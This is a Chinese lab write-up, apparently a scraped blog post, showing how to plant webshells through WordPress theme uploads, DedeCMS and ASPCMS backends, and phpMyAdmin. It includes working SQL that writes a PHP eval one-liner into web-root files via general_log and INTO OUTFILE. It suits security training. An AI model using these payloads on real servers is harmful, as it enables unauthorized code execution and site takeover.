当前位置: 首页 > article >正文

常见CMS漏洞(wordpress,DedeCms,ASPCMS,PHPMyAdmin)

练习一:wordpress漏洞测试

1.上传包含木马的主题

安装网站

登陆网站 上传主题处测试漏洞注入

在上传主题模板压缩包中写入一句话木马

网站上传含有木马的zip压缩包

上传成功

wordpress主题目录 wp-content/themes 访问上传木马测试

2.修改主题的配置文件为含有木马的文件

练习2:DedeCMS-V5.7.82-UTF8 漏洞测试

安装网站

登录后台管理网站

1.通过文件管理器上传webshell

2.修改模板文件拿webshell

浏览主页 内容为所写入的phpinfo

3.后台任意命令执行拿webshell

查看添加广告路径

找到路径

进行木马连接

4.通过后台sql命令执行拿webshell

查看文件属性 发现是刚才写入的文件

进行木马连接

练习3:ASPCMS漏洞测试

登录网站后台

再访问网站后台

抓包

抓包修改 写入一句话木马 放行 页面修改成功

配置文件中写入了一句话木马

木马连接

练习4:PHPMyAdmin漏洞测试

网站根目录下更新了目录

访问网站 数据库账户密码 登录

1.界面图形化getshell

2.通过日志文件getshell
show global variables like '%general%';

查看 状态 (同样也可以在这里进行命令也可以修改日志位置)

set global general_log='on';
set global general_log_file = 'D:/phpstudy_pro/WWW/111.php'

写入一句话木马

select '<?php eval($_POST[cmd]);?>';

查看写入位置有写入文件

木马连接

3.导入导出getshell

先判断mysql位置

猜测网站路径D:/phpstudy_pro/www

写入木马文件

select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/WWW/aaa.php';

进行木马连接


http://www.kler.cn/a/463614.html

相关文章:

  • 一文讲清楚HTTP常见的请求头和应用
  • 【工具推荐】XSS 扫描器-XSStrike
  • 【GO基础学习】gin的使用
  • C++ 设计模式:备忘录模式(Memento Pattern)
  • 机器学习之逻辑回归算法、数据标准化处理及数据预测和数据的分类结果报告
  • Linux实验报告12-Apache服务器的配置
  • MATLAB 中打印某些变量的值到文本文件中,使用diary和 fprintf
  • 人工智能:变革时代的核心驱动力
  • 阿里云redis内存优化——PCP数据清理
  • 华为开源自研AI框架昇思MindSpore应用案例:ICNet用于实时的语义分割
  • C# 将图片转换为PDF文档
  • 虹安信息技术有限公司数据泄露防护平台pushSetup存在SQL注入漏洞
  • 【Elasticsearch入门到落地】5、安装IK分词器
  • [最佳方法] 如何将视频从 Android 发送到 iPhone
  • Windows操作系统部署Tomcat详细讲解
  • LeetCode 3280.将日期转换为二进制表示:库函数实现或手动转换
  • 力扣第129题:求根到叶子节点数字之和 - C语言解法
  • 报错:nginx [emerg] open() etcnginxnginx.conf failed (2 No such file or directory)
  • 【网络协议】开放式最短路径优先协议OSPF详解(一)
  • WebRTC的三大线程
  • 设计模式の状态策略责任链模式
  • 【漫话机器学习系列】027.混淆矩阵(confusion matrix)
  • 计算机网络•自顶向下方法:DHCP、NAT、IPV6
  • 大模型WebUI:Gradio全解系列8——Additional Features:补充特性(下)
  • 如何将vCenter6.7升级7.0?
  • vSAN手动平衡磁盘